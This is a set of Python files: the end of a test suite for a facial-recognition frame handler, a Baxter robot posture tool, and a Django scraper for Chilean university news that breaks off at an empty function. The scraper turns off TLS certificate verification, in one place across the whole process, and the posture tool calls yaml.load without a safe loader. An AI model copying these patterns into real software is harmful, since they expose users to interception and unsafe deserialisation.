    """Tests for FacialRecognitionHandler's frame save/fetch lifecycle."""

    # shared fixture data: a single channel registered/unregistered per test
    channel_name = "facial_recognition"
    media_type = "video"
    channel_manager = ChannelManager()
    handler = None

    def func_end(self):
        # stop the handler's worker thread and release the channel
        self.handler.close_thread_switch = True
        channel_name = TestFacialRecognitionHandler.channel_name
        TestFacialRecognitionHandler.channel_manager.unregister_one_channel(channel_name)

    def func_begin(self):
        # register the channel and build a fresh handler under test
        channel_name = TestFacialRecognitionHandler.channel_name
        media_type = TestFacialRecognitionHandler.media_type
        TestFacialRecognitionHandler.channel_manager.register_one_channel(channel_name)
        self.handler = FacialRecognitionHandler(channel_name, media_type)

    @classmethod
    def tearDownClass(cls):
        pass

    @classmethod
    def setUpClass(cls):
        pass

    def run_thread(self, func):
        # fire-and-forget helper used to mutate handler state concurrently
        thread = threading.Thread(target=func)
        thread.start()

    def set_img_data(self):
        # sets img_data after a short delay (background-thread helper)
        time.sleep(0.5)
        self.handler.img_data = b'1234'

    def set_img_data_none(self):
        # clears img_data after a delay so save_frame's wait loop can finish
        time.sleep(1.5)
        self.handler.img_data = None

    @patch('threading.Event.clear', return_value = True)
    @patch('threading.Event.wait', return_value = True)
    def test_save_frame1(self, mock1, mock2):
        # save_frame with pending img_data and mocked event synchronization
        self.func_begin()
        image = b'1234'
        face_list = []
        self.handler.img_data = b'12'
        self.handler.save_frame(image, face_list)
        self.func_end()

    def test_save_frame2(self):
        # save_frame blocks until a background thread clears img_data
        self.func_begin()
        image = b'1234'
        face_list = []
        self.handler.img_data = b'12'
        self.run_thread(self.set_img_data_none)
        self.handler.save_frame(image, face_list)
        self.func_end()

    @patch('threading.Event.clear', return_value = True)
    @patch('threading.Event.wait', return_value = True)
    def test_frames(self, mock1, mock2):
        self.func_begin()
        self.handler.close_thread_switch = True
        time.sleep(0.5) # wait thread exit
        self.handler.img_data = None

        # force an immediate heartbeat timeout so frames() yields None once
        backup_heartbeat = facial_recognition_handler.HEARTBEAT_TIMEOUT
        facial_recognition_handler.HEARTBEAT_TIMEOUT = 0
        self.handler.close_thread_switch = False
        for frame in self.handler.frames():
            self.assertEqual(frame, None)
            break
        facial_recognition_handler.HEARTBEAT_TIMEOUT = backup_heartbeat
        self.func_end()

    @patch('threading.Event.clear', return_value = True)
    @patch('threading.Event.wait')
    def test_get_frame(self, mock1, mock2):
        self.func_begin()
        self.handler.frame_data = b'123'
        self.handler.face_list = []
        self.handler.fps = 5

        # event signalled -> a populated frame dict is returned
        mock1.return_value = True
        ret = self.handler.get_frame()
        self.assertNotEqual(ret, {})

        # wait timed out -> empty dict
        mock1.return_value = False
        ret = self.handler.get_frame()
        self.assertEqual(ret, {})
        mock1.return_value = True
        self.func_end()
if __name__ == '__main__':
    # unittest.main()
    # run only the frames() test when executed directly
    suite = unittest.TestSuite()
    suite.addTest(TestFacialRecognitionHandler("test_frames"))
    runner = unittest.TextTestRunner()
    runner.run(suite)
set_posture.py | #!/usr/bin/env python
"""
Tool that use to set Baxter into different modes
"""
import os
import rospy
import argparse
import baxter_interface
import yaml
from ik_solver import solve_IK
import threading
import alloy.ros
def move_arm_to_pose(limb_name, pose):
    """Solve IK for *pose* and move the given Baxter limb there (blocking)."""
    limb_interface = baxter_interface.Limb(limb_name)

    # the IK solution carries parallel name/position sequences; pair them up
    # into the {joint_name: position} mapping the move call expects
    solution = solve_IK(limb_name, pose)
    target_positions = dict(zip(solution.name, solution.position))

    limb_interface.move_to_joint_positions(target_positions)
def move_to_posture(posture_name, record_path="posture_records.yaml", block=True, done_cb=None):
    """Move Baxter's arms to a posture previously stored with save_posture().

    posture_name: key into the YAML posture record file.
    record_path: record file, resolved inside the tbd_baxter_tools res dir.
    block, done_cb: NOTE(review): currently unused — the call always blocks
    and no callback is ever invoked; confirm before relying on them.
    """
    #rospy.init_node("bax_set_posture")
    left_limb = baxter_interface.Limb('left')
    right_limb = baxter_interface.Limb('right')

    # resolve the record file path; silently does nothing when not found
    record_path = alloy.ros.resolve_res_path(record_path,"tbd_baxter_tools")
    if record_path:
        with open(record_path,'r') as f:
            posture_list = yaml.load(f)
        joint_angles = posture_list[posture_name]

        if 'left' in joint_angles and 'right' in joint_angles:
            # move both arms simultaneously, one thread per limb
            lt = threading.Thread(target=left_limb.move_to_joint_positions, args=(joint_angles['left'],))
            rt = threading.Thread(target=right_limb.move_to_joint_positions, args=(joint_angles['right'],))
            lt.start()
            rt.start()
            lt.join()
            rt.join()
        elif 'left' in joint_angles:
            left_limb.move_to_joint_positions(joint_angles['left'])
        elif 'right' in joint_angles:
            right_limb.move_to_joint_positions(joint_angles['right'])
def save_posture(posture_name, button_control=True, arm=None, record_path="posture_records.yaml"):
    """Record Baxter's current joint angles under *posture_name*.

    button_control: when True, wait for either arm's navigator OK button
    before sampling the joint angles.
    arm: 'left', 'right', or None to record both arms.
    record_path: YAML record file inside the tbd_baxter_tools res dir;
    created when missing.
    """
    if button_control:
        left_nav = baxter_interface.Navigator('left')
        right_nav = baxter_interface.Navigator('right')

        # block until one of the OK (button0) buttons is pressed
        while not left_nav.button0 and not right_nav.button0:
            rospy.sleep(0.1)

    # sample the current joint angles of both arms
    left_joint_angles = baxter_interface.Limb('left').joint_angles()
    right_joint_angles = baxter_interface.Limb('right').joint_angles()
    posture_list = dict()

    # resolve path
    record_path = alloy.ros.resolve_res_path(record_path,"tbd_baxter_tools")
    # create the file at the root of `tbd_baxter_tools\res` if doesn't exist
    if record_path is None:
        record_path = os.path.join(alloy.ros.create_res_dir("tbd_baxter_tools"),"posture_records.yaml")

    # seed an empty record file when missing
    # (fix: the original used the Python 2-only 'file()' builtin, which raises
    # NameError on Python 3, and leaked the handle)
    if not os.path.exists(record_path):
        with open(record_path,'w') as f:
            yaml.dump(posture_list, f)

    # fix: mode was 'rw', which is not a valid open() mode — only reading
    # happens here, so open read-only
    with open(record_path,'r') as f:
        posture_list = yaml.load(f)

    if arm == 'right':
        posture_list[posture_name] = {
            'right': right_joint_angles
        }
    elif arm == 'left':
        posture_list[posture_name] = {
            'left': left_joint_angles,
        }
    else:
        posture_list[posture_name] = {
            'left': left_joint_angles,
            'right': right_joint_angles
        }

    with open(record_path,'w') as f:
        yaml.dump(posture_list, f)
views.py | from django.shortcuts import render
from news.models import Universidad, Noticia
from bs4 import BeautifulSoup
from django.conf import settings
import feedparser, unicodedata, urllib.request, time, re, datetime, time, threading
import ssl
import dateutil.parser
import logging
import unidecode
result = []
# Create your views here.
def scraper(request):
    """Run every university news scraper and render a debug report.

    In production (settings.DEBUG is False) each scraper runs in its own
    thread; in development they are called sequentially so the debug panel
    at uninews.datoslab.cl/scraper can show per-site errors. Outcomes are
    accumulated in the module-level 'result' list.
    """
    hora = {}
    hora["start"] = time.strftime("%H:%M:%S")
    hora_inicio = time.time()

    if settings.DEBUG == False:
        # Use threads in production
        logging.basicConfig( level=logging.DEBUG, format='[%(levelname)s] - %(threadName)-10s : %(message)s')

        universidades = [
            {'target':pucv, 'name':'PUCV'},
            {'target':ucn, 'name':'UCN'},
            {'target':utfsm, 'name':'UTFSM'},
            {'target':uv, 'name':'UV'},
            {'target':upla, 'name':'UPLA'},
            {'target':udec, 'name':'UDEC'},
            {'target':utalca, 'name':'UTALCA'},
            {'target':ulagos, 'name':'ULAGOS'},
            {'target':unap, 'name':'UNAP'},
            {'target':ua, 'name':'UA'},
            {'target':uda, 'name':'UDA'},
            {'target':userena, 'name':'USERENA'},
            {'target':uoh, 'name':'UOH'},
            {'target':ucm, 'name':'UCM'},
            {'target':ubiobio, 'name':'UBIOBIO'},
            {'target':ucsc, 'name':'UCSC'},
            {'target':ufro, 'name':'UFRO'},
            {'target':uct, 'name':'UCT'},
            {'target':uach, 'name':'UACH'},
            {'target':uaysen, 'name':'UAYSEN'},
            {'target':umag, 'name':'UMAG'},
            {'target':uta, 'name':'UTA'}
        ]

        # Spawn one worker thread per university scraper
        for universidad in universidades:
            threading.Thread(target=universidad['target'], name=universidad['name']).start()
    else:
        # This way of running the scrapers is very slow, but the
        # uninews.datoslab.cl/scraper panel only shows error/debug
        # information when run like this. Development only.
        #pucv() # Working
        #ucn() # Working
        #utfsm() # Working
        #uv() # Working
        #upla() # Working #Review
        #udec() # Working
        #utalca() # Working #Review
        #ulagos() # Working
        #ucsc() # Working
        #ubiobio() # Working
        #uda() # Working
        #userena() # Working #Review
        # unap() # Working
        #ua() # Working
        # uoh() could not be scraped
        # ucm() # Working
        # ufro() # Working
        # uct() # Angular-rendered site, needs selenium
        # uach()
        # uaysen()
        umag() # Working - review the summary ("bajada") extraction
        # uta() # Working

    hora_fin = time.time()
    hora["finish"] = time.strftime("%H:%M:%S")
    hora["total"] = hora_fin - hora_inicio

    result.append({'status':"", 'error_message':'', 'universidad':'', 'titulo':'', 'bajada':'', 'fecha':'', 'link_noticia':'', 'link_recurso':'', 'categoria':''})
    return render(request, "scraper/scraper.html", {'result':result, 'hora':hora})
def saveNew(new):
    """Persist one scraped news item, skipping it when it already exists.

    *new* is a dict with keys: universidad (Universidad model), titulo,
    bajada, fecha, link_noticia, link_recurso, categoria. The outcome of each
    attempt is appended to the module-level 'result' list for the debug page.
    """
    try:
        # Look the item up by title + university alias; a miss raises
        # DoesNotExist, which is the signal to create it (EAFP)
        n = Noticia.objects.get(titulo=new['titulo'], id_universidad__alias = new['universidad'].alias)
        print(new['universidad'].alias + ": " + new['titulo'] + " | Existe")
        e = "Existe"
        # Already stored: only record the fact for the debug page
        result.append({'status':"exist", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
    except Noticia.DoesNotExist as e:
        # Not found: build and persist the new row
        n = Noticia(
            titulo=new['titulo'],
            titulo_busqueda=formatear_busqueda(new['titulo']),
            bajada=new['bajada'],
            bajada_busqueda=formatear_busqueda(new['bajada']),
            fecha=new['fecha'],
            link_noticia=new['link_noticia'],
            link_recurso=new['link_recurso'],
            id_universidad=new['universidad'],
            categoria=new['categoria'],
            contador_visitas=0
        )
        n.save() # persist the news item to the database
        print(new['universidad'].alias + ": " + new['titulo'] + " | Insertada")
        e = "Insertada"
        result.append({'status':"ok", 'error_message':e, 'universidad':new['universidad'], 'titulo':new['titulo'], 'bajada':new['bajada'], 'fecha':new['fecha'], 'link_noticia':new['link_noticia'], 'link_recurso':new['link_recurso'], 'categoria':new['categoria']})
def formatear_busqueda(text):
    """Normalize *text* for search: ASCII-fold, lowercase, strip punctuation.

    Any change here must be mirrored in 'search_fix' in the news app views.
    """
    text = unidecode.unidecode(text).lower()
    # one C-level pass instead of ten chained .replace() calls; the deleted
    # character set is exactly the one the original removed
    return text.translate(str.maketrans('', '', '"?¿:#.,;()'))
def formatear_fecha(fecha, universidad):
    """Normalize a scraped date string to ISO 'YYYY-MM-DD'.

    Each university publishes dates in a different raw format; *universidad*
    selects how day/month/year are extracted. Spanish/English month names and
    single-digit days are zero-padded. As in the original, an unknown alias
    raises UnboundLocalError.
    """
    # these sites publish dates that dateutil can parse directly
    # (fix: the original parsed the same string three times per branch and
    # repeated the identical branch nine times)
    if universidad in ('udec', 'ucsc', 'uda', 'userena', 'ua', 'ucm', 'ufro', 'uta', 'umag'):
        parsed = dateutil.parser.parse(fecha)
        dia = parsed.strftime('%d')
        mes = parsed.strftime('%m')
        anno = parsed.strftime('%Y')
    elif universidad == "uv":
        partes = fecha.split()  # e.g. '12 de marzo de 2020'
        dia, mes, anno = partes[0], partes[2].lower(), partes[4]
    elif universidad in ("upla", "ufsm", "ucn", "ubiobio"):
        partes = fecha.split()  # day/month/year at tokens 1/2/3
        dia, mes, anno = partes[1], partes[2].lower(), partes[3]
    elif universidad == "pucv":
        partes = fecha.split()  # day/month/year at tokens 1/3/5
        dia, mes, anno = partes[1], partes[3].lower(), partes[5]
    elif universidad == "utalca":
        partes = fecha.lower().split()
        dia, mes, anno = partes[0], partes[1], partes[2]
    elif universidad == "ulagos":
        partes = fecha.lower().split('/')  # e.g. '7/10/2019'
        dia, mes, anno = partes[0], partes[1], partes[2]
    elif universidad == 'unap':
        partes = fecha.lower().split()  # day/month/year at tokens 1/3/5
        dia, mes, anno = partes[1], partes[3], partes[5]

    # month name / English abbreviation / bare number -> zero-padded month;
    # already-normalized values (e.g. '03') pass through unchanged
    meses = {
        'enero': '01', 'jan': '01', '1': '01',
        'febrero': '02', 'feb': '02', '2': '02',
        'marzo': '03', 'mar': '03', '3': '03',
        'abril': '04', 'apr': '04', '4': '04',
        'mayo': '05', 'may': '05', '5': '05',
        'junio': '06', 'jun': '06', '6': '06',
        'julio': '07', 'jul': '07', '7': '07',
        'agosto': '08', 'aug': '08', '8': '08',
        'septiembre': '09', 'sep': '09', '9': '09',
        'octubre': '10', 'oct': '10', '10': '10',
        'noviembre': '11', 'nov': '11', '11': '11',
        'diciembre': '12', 'dec': '12', '12': '12',
    }
    mes = meses.get(mes, mes)

    # zero-pad single-digit days ('1' -> '01'); other values pass through
    if dia in ('1', '2', '3', '4', '5', '6', '7', '8', '9'):
        dia = '0' + dia

    #fecha = dia + "/" + mes + "/" + anno
    fecha = anno + "-" + mes + "-" + dia
    return fecha
# Cleans up a scraped category name into a URL-friendly slug
def setCategoria(categoria = ''):
    """Return a slug for *categoria*; 'sin-categoria' when empty or None."""
    if categoria == '' or categoria is None:  # fix: was '== None'
        return 'sin-categoria'
    else:
        categoria = categoria.lower()
        categoria = elimina_tildes(categoria)
        categoria = categoria.replace(" ", "-")
        categoria = categoria.replace("&", "y")
        return categoria
def elimina_tildes(s):
    """Return *s* with combining accent marks removed (via NFD decomposition)."""
    descompuesta = unicodedata.normalize('NFD', s)
    return ''.join(c for c in descompuesta if unicodedata.category(c) != 'Mn')
# Universidad de Playa Ancha
def upla():
    """Scrape Universidad de Playa Ancha news from its RSS feed and save each item."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UPLA')
    url_rss = "https://www.upla.cl/noticias/feed/" # RSS feed URL
    feed = feedparser.parse( url_rss ) # Fetch and parse the XML
    for item in feed['items']:
        try:
            titulo = item['title']
            bajada = item['summary']
            link = item['link']
            fecha = item['published']
            fecha = formatear_fecha(fecha, "upla")
            # Normalize the category so it can be used to build the category URL
            categoria_busqueda = setCategoria(item['category'])
            if categoria_busqueda == 'gestion-institucional':
                categoria_busqueda = 'gestion'
            # Open the category listing page and collect all of its news entries
            contents = urllib.request.urlopen("https://www.upla.cl/noticias/category/"+categoria_busqueda).read()
            bs = BeautifulSoup(contents, "html.parser")
            # Categories with a special page layout need a different selector
            if categoria_busqueda == 'coronavirus':
                articles = bs.find_all("div", ["timeline-content"])
            else:
                articles = bs.find_all("article", ["item-list"])
            # For each news entry on the category page, extract its title
            for article in articles:
                if categoria_busqueda == 'coronavirus':
                    titulo_articulo = article.h2.a.text
                else:
                    titulo_articulo = article.find("a").text
                # If the page title matches the RSS title, take that entry's image and stop
                if titulo_articulo == titulo:
                    imagen = article.find("img")['src']
                    break
                else:
                    imagen = ''
            # Persist the news item in the database
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # Collect the error so it can be shown on the debug screen.
            # NOTE(review): if the failure happened before all the names below
            # were assigned (e.g. 'titulo' on the first line of the try), this
            # handler itself raises NameError — confirm and consider defaults.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Pontificia Universidad Católica de Valparaíso
def pucv():
    """Scrape Pontificia Universidad Católica de Valparaíso news from its portal.

    Walks the news listing page, opens each article to extract title, summary
    (bajada), date, image and category, and stores each item via saveNew().
    Warnings and errors are appended to the module-level ``result`` list for
    the debug screen.
    """
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='PUCV')
    nombre_uni = "pucv"
    # The PUCV site has TLS certificate issues; skip verification.
    context = ssl._create_unverified_context()
    contents = urllib.request.urlopen("https://www.pucv.cl/pucv/site/tax/port/all/taxport_1___1.html", context=context).read()
    bs = BeautifulSoup(contents, "html.parser")
    articulos = bs.find_all("article")
    for articulo in articulos:
        # BUGFIX: the warning handlers below previously referenced
        # 'categoria_busqueda' (and friends) before assignment, raising
        # NameError inside the handler.  Initialize every name the
        # handlers use so an early failure reports cleanly instead.
        categoria_busqueda = 'sin-categoria'
        titulo = bajada = fecha = link = imagen = ''
        try:
            link = articulo.a['href']
            link = "https://www.pucv.cl" + link.replace("..", "")
            fecha = articulo.find("span",{"class":"fecha aright"})
            imagen = articulo.img['src']
            imagen = "https://pucv.cl" + imagen.replace("..","")
            pagina_noticia = urllib.request.urlopen(link).read()
            bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
            titulo = bs_noticia.find("h1", { "class" : "titular" }).text
            # Fall back to today's date when the listing has no date span.
            if fecha is None:
                fecha = time.strftime("%Y-%m-%d")
            else:
                fecha = formatear_fecha(fecha.text,nombre_uni)
            try:
                bajada = bs_noticia.find("p",{ "class" : "bajada" }).text
            except Exception as e:
                bajada = ''
                result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
            # The category comes from the article page's breadcrumb trail.
            try:
                newpage = urllib.request.urlopen(link).read()
                bs_cate = BeautifulSoup(newpage, "html.parser")
                categoria = bs_cate.find("div",{ "class" : "breadcrumbs" })
                categorias = categoria.findAll("a")
                category = categorias[2].text
                categoria_busqueda = setCategoria(category)
            except Exception as e:
                categoria_busqueda = 'sin-categoria'
                result.append({'status':"warning", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
            saveNew({'status':"ok", 'error_message':'', 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad Católica del Norte
def ucn():
    """Scrape Universidad Católica del Norte news from its RSS feed and save each item."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UCN')
    # The feed host has certificate issues; disable HTTPS verification globally.
    if hasattr(ssl, '_create_unverified_context'):
        ssl._create_default_https_context = ssl._create_unverified_context
    d = feedparser.parse("https://www.noticias.ucn.cl/feed/")
    for e in d.entries:
        try:
            titulo = (e.title)
            nombre_uni = "ucn"
            link = (e.link)
            categoria_busqueda = setCategoria((e.category))
            fecha = e.published
            fecha = formatear_fecha(fecha,nombre_uni)
            # The lede is the text right after the first self-closing tag.
            description = e.description.split("/>")
            bajada = description[1]
            cuerpo = e['content']
            contenido = cuerpo[0].value
            # First image URL in the body, with the WP thumbnail suffix removed.
            imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url").replace("-150x150", "")
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): 'e' shadows the loop variable here, and names
            # assigned above may be unbound if the failure happened early.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
#Universidad Técnico Federico Santa María
def utfsm():
    """Scrape Universidad Técnico Federico Santa María news from its RSS feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UTFSM')
    d = feedparser.parse("https://noticias.usm.cl/feed/")
    for e in d.entries:
        try:
            titulo = (e.title)
            nombre_uni = "ufsm"
            link = (e.link)
            categoria_busqueda = setCategoria((e.category))
            # Strip the WordPress "read more" ellipsis marker from the summary.
            bajada = (e.description).replace("[…]", "").strip()
            fecha = e.published
            fecha = formatear_fecha(fecha,nombre_uni)
            cuerpo = e['content']
            contenido = cuerpo[0].value
            # First image URL found in the article body, if any.
            try:
                imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
            except:
                imagen = ''
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): 'e' shadows the loop variable; names above may be
            # unbound here if the failure happened early in the try block.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de Valparaíso
def uv():
    """Scrape Universidad de Valparaíso news from its web archive pages."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UV')
    contents = urllib.request.urlopen("https://www.uv.cl/pdn/archivo/").read()
    bs = BeautifulSoup(contents, "html.parser")
    divs = bs.find_all("div", ["item n_caja borde6", "item n_caja borde6 fin"])
    for div in divs:
        try:
            fecha = div.find("div", ["fecha"]).text
            fecha = formatear_fecha(fecha, "uv")
            link = div.a['href']
            link = "https://www.uv.cl/pdn" + link.replace("..", "")
            # Open the article page itself
            pagina_noticia = urllib.request.urlopen(link).read()
            bs_noticia = BeautifulSoup(pagina_noticia, "html.parser")
            titulo = bs_noticia.find("div", id="n_titulo").text
            bajada = bs_noticia.find("div", id="n_bajada").text
            try:
                imagen = bs_noticia.find("div", id="n_clipex").img['src']
                imagen = "https://www.uv.cl" + imagen
            except TypeError:
                # No clip image on the article page — fall back to the listing thumbnail
                imagen = div.find("img", ["sombra"])['src']
                imagen = "https://www.uv.cl/pdn" + imagen.replace("..", "")
            categoria_busqueda = setCategoria()
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here if the failure
            # happened early in the try block — verify.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de Concepción
def udec():
    """Scrape Universidad de Concepción news from its RSS feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UDEC')
    url_rss = "https://noticias.udec.cl/feed/"
    feed = feedparser.parse( url_rss )
    for item in feed['items']:
        try:
            titulo = item['title']
            link = item['link']
            # The lede is the first paragraph of the HTML summary.
            bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text.strip()
            fecha = item['published']
            fecha = formatear_fecha(fecha, "udec")
            categoria_busqueda = setCategoria(item['category'])
            # Second large image on the article page is the story image.
            imagen = BeautifulSoup(urllib.request.urlopen(link).read(), "html.parser").find_all('img', {'class': 'attachment-large size-large'})[1]['src']
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de Talca
def utalca():
    """Scrape Universidad de Talca news from its listing page."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UTALCA')
    contents = urllib.request.urlopen("https://www.utalca.cl/noticias/").read()
    bs = BeautifulSoup(contents, "html.parser")
    items = bs.find('div', {'class': 'section-news'})
    items = items.find_all("div", {"class": "card-news"})
    items = list(set(items)) # Remove duplicate entries
    for item in items:
        try:
            link = item.a['href']
            titulo = item.find("h5").text
            # The card's first paragraph (if present) names the category.
            if item.div.p is None:
                categoria_busqueda = setCategoria()
            else:
                categoria_busqueda = setCategoria(item.div.p.text)
            noticia = urllib.request.urlopen(link).read()
            bs_noticia = BeautifulSoup(noticia, "html.parser")
            bajada = bs_noticia.find("div", {"class": "interior-body"}).h6.text
            fecha = bs_noticia.find("div", {"class": "interior-body"}).span.text
            fecha = formatear_fecha(fecha, 'utalca')
            imagen = bs_noticia.find("img", {"class": "attachment-post-thumbnail size-post-thumbnail wp-post-image"})['src']
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de Los Lagos
def ulagos():
    """Scrape Universidad de Los Lagos news across its campus category pages."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='ULAGOS')
    items = []
    # One listing page per campus/branch category.
    categorias = ['campus-osorno', 'campus-pto-montt', 'sede-santiago', 'sede-chiloe']
    for categoria in categorias:
        contents = urllib.request.urlopen("https://www.ulagos.cl/category/" + categoria + "/").read()
        bs = BeautifulSoup(contents, "html.parser")
        items.extend(bs.find_all("div", {"class": "ultimas-noticias"}))
    for item in items:
        try:
            link = item.a['href']
            titulo = item.find("div", {"class": "overflow_titulo_noticias"}).text.strip()
            noticia = urllib.request.urlopen(link).read()
            bs_noticia = BeautifulSoup(noticia, "html.parser")
            bajada = bs_noticia.find("div", {"class":"title-post"}).span.text.strip()
            categoria_busqueda = bs_noticia.find("div", {"class":"category-post"}).a.text.lower().strip()
            categoria_busqueda = setCategoria(categoria_busqueda)
            fecha = bs_noticia.find("div", {"class":"conten-post-date"}).text.strip()
            fecha = formatear_fecha(fecha, "ulagos")
            # Featured image is optional on this site.
            if bs_noticia.find("img", {"class": "img-destacado"}) is None:
                imagen = ''
            else:
                imagen = bs_noticia.find("img", {"class": "img-destacado"})["src"]
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad Católica de la Santísima Concepción
def ucsc():
    """Scrape Universidad Católica de la Santísima Concepción news pages."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UCSC')
    contents = urllib.request.urlopen("https://www.ucsc.cl/noticias/").read()
    bs = BeautifulSoup(contents, "html.parser")
    items = bs.find_all("article", {"class": "hentry-news"})
    items = list(set(items)) # Remove duplicate entries
    for item in items:
        try:
            link = item.header.h2.a['href']
            titulo = item.header.h2.a.text
            fecha = item.header.p.time['datetime']
            fecha = formatear_fecha(fecha, 'ucsc')
            noticia = urllib.request.urlopen(link).read()
            bs_noticia = BeautifulSoup(noticia, "html.parser")
            bajada = bs_noticia.find("div", {"class": "entry-summary"}).p.text
            # Header image is optional.
            try:
                imagen = bs_noticia.find("article", {"class": "hentry hentry-news"}).header.span.img['src']
            except Exception as e:
                imagen = ''
            categoria_busqueda = bs_noticia.find("a", {"rel": "category tag"})
            categoria_busqueda = setCategoria(categoria_busqueda.text)
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad del Bío-Bío
def ubiobio():
    """Scrape Universidad del Bío-Bío news from its RSS feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UBIOBIO')
    d = feedparser.parse("http://noticias.ubiobio.cl/feed/")
    for e in d.entries:
        try:
            titulo = (e.title)
            link = (e.link)
            categoria_busqueda = setCategoria(e.category)
            # Strip the "read more" ellipsis marker, then take the first paragraph.
            bajada = (e.description).replace("[…]", "")
            bs_bajada = BeautifulSoup(bajada, "html.parser")
            bajada = bs_bajada.find("p").text
            fecha = e.published
            fecha = formatear_fecha(fecha,'ubiobio')
            cuerpo = e['content']
            contenido = cuerpo[0].value
            # First image URL found in the article body.
            imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): 'e' shadows the loop variable; names above may be
            # unbound here if the failure happened early in the try block.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad Arturo Prat
def unap():
    """Scrape Universidad Arturo Prat news across its per-category listing pages."""
